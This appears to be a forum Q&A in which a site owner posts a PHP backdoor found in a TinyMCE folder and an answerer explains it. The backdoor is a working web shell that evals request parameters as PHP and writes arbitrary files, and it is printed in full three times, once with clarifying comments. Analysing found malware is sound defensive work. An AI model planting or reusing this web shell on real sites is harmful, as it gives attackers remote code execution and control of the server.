I got a spam bot on my website, which was uploaded through a backdoor. I rummaged through the logs and found the backdoor. I want to understand what it does, because I'm not strong in PHP, and what harm it could bring. I'll add that it was in the TinyMCE folder.

    <?php
    $vycv = "d4e147814c9311b6503b572e484a4bb2";
    if(isset($_REQUEST['mmjzvk'])) {
        $oaxa = $_REQUEST['mmjzvk'];
        eval($oaxa);
        exit();
    }
    if(isset($_REQUEST['emgakm'])) {
        $bhiu = $_REQUEST['hzxzunoh'];
        $ygvi = $_REQUEST['emgakm'];
        $kihku = fopen($ygvi, 'w');
        $wbmgoq = fwrite($kihku, $bhiu);
        fclose($kihku);
        echo $wbmgoq;
        exit();
    }
    ?>


    Let's go through it.

    <?php
    $vycv = "d4e147814c9311b6503b572e484a4bb2";
    if(isset($_REQUEST['mmjzvk'])) {
        $oaxa = $_REQUEST['mmjzvk'];
        eval($oaxa);
        exit();
    }
    if(isset($_REQUEST['emgakm'])) {
        $bhiu = $_REQUEST['hzxzunoh'];
        $ygvi = $_REQUEST['emgakm'];
        $kihku = fopen($ygvi, 'w');
        $wbmgoq = fwrite($kihku, $bhiu);
        fclose($kihku);
        echo $wbmgoq;
        exit();
    }
    ?>

    That is, the script checks whether there is a mmjzvk or emgakm parameter in the incoming data (in GET, POST or cookies). If the first one is present, its value is treated as PHP code and executed. If the second key ( emgakm ) is present, its value is interpreted as the name of the file to which the text passed via the hzxzunoh key is written.

    These two actions are sufficient for all sorts of destructive activity.

    UPD

    I did some "refactoring" :) I think the code should now be clearer.

    <?php
    $vycv = "d4e147814c9311b6503b572e484a4bb2";

    // execute a command
    if(isset($_REQUEST['mmjzvk'])) {
        $command = $_REQUEST['mmjzvk'];
        // execute the string as PHP code.
        // http://php.net/manual/ru/function.eval.php
        eval($command);
        exit();
    }

    // write to a file
    if(isset($_REQUEST['emgakm'])) {
        $text = $_REQUEST['hzxzunoh'];
        $filename = $_REQUEST['emgakm'];
        // standard code for writing text to a file.
        $file_desc = fopen($filename, 'w');
        $result = fwrite($file_desc, $text);
        fclose($file_desc);
        // output the write result: either the number of bytes written, or false if it failed
        echo $result;
        exit();
    }
    ?>